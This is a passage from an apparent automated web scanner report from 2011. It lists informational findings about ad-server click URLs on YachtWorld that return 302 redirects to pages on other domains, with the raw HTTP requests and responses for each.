<p>The document has moved <a href="http://yacht.galatiyachts.com/maritimo-yachts/?utm_source=yachtworld&amp;utm_medium=banner&amp;utm_campaign=maritimo">here</a>
...[SNIP]...

3.2. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1070264900/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiXkhU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?">here</a>
...[SNIP]...

3.3. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1166415081/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1166415081/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1166415081/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldmagazine.com/indigital.htm
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldmagazine.com/indigital.htm">here</a>
...[SNIP]...

3.4. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1306972267/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1306972267/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1306972267/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blue-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldmagazine.com/indigital.htm
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldmagazine.com/indigital.htm">here</a>
...[SNIP]...

3.5. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1391248166/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiXkkU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?">here</a>
...[SNIP]...

3.6. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1813621051/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1813621051/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/1813621051/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldmagazine.com/indigital.htm
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldmagazine.com/indigital.htm">here</a>
...[SNIP]...

3.7. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/2127223170/Top1/Boats/byh3-yen-bd10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: RMFS=011PiXkkU30erBjd|U10esfwB; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.247realmedia.com
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?">here</a>
...[SNIP]...

3.8. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/218394558/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-motoryacht-728.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/218394558/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-motoryacht-728.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/218394558/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-motoryacht-728.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldcharters.com
Content-Length: 310
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldcharters.com">here</a>.</p
...[SNIP]...

3.9. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/406859034/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blk-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/406859034/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blk-sky.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/406859034/Right1/Boats/byh5dig-yen-bd10/ywm-digital-blk-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldmagazine.com/indigital.htm
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldmagazine.com/indigital.htm">here</a>
...[SNIP]...

3.10. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/616229800/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-harbor-728.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/616229800/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-harbor-728.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/616229800/Top1/Boats/byh8-ywcharters-yen-bd10/byh8-yc-jan11-harbor-728.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldcharters.com
Content-Length: 310
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldcharters.com">here</a>.</p
...[SNIP]...

3.11. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/658221905/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/658221905/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/openboatdetails.html/L42/658221905/Right1/Boats/byh5dig-yen-bd10/ywm-digital-wht-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:32 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworldmagazine.com/indigital.htm
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworldmagazine.com/indigital.htm">here</a>
...[SNIP]...

3.12. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1040445805/Right1/Boats/byh10-ywmobile-yen-sr/yw-mobile-blk-en-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1040445805/Right1/Boats/byh10-ywmobile-yen-sr/yw-mobile-blk-en-sky.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1040445805/Right1/Boats/byh10-ywmobile-yen-sr/yw-mobile-blk-en-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/boat-content/2010/01/21/yachtworldcom-goes-mobile/
Content-Length: 353
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-content/2010/01/21/yachtworldcom-goes-mobile/">here</a>
...[SNIP]...

3.13. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1125872364/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1125872364/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1125872364/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/core/insurance/insurance.jsp
Content-Length: 331
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/core/insurance/insurance.jsp">here</a>
...[SNIP]...

3.14. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1371771958/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1371771958/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1371771958/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/boat-loans/index.jsp?
Content-Length: 324
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/boat-loans/index.jsp?">here</a>
...[SNIP]...

3.15. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1552147843/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1552147843/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/1552147843/Right1/Boats/BYH7-Y-SRM1/insure-sky.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NXCLICK2=011PiBxRNX_TRACK_Abc/Retarget_ABCHomepage_Nonsecure!y!B3!gA!14l; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl; RMFS=011PiXSrU30erBjd|U10esfwB;

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:43:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.yachtworld.com/core/insurance/insurance.jsp
Content-Length: 331
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.yachtworld.com/core/insurance/insurance.jsp">here</a>
...[SNIP]...

3.16. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/2013449512/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.yachtworld.com/en/opensearchresults.html/L44/2013449512/Top1/Boats/byh3-yen-sr10/byh3-boatloan-728.JPG/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

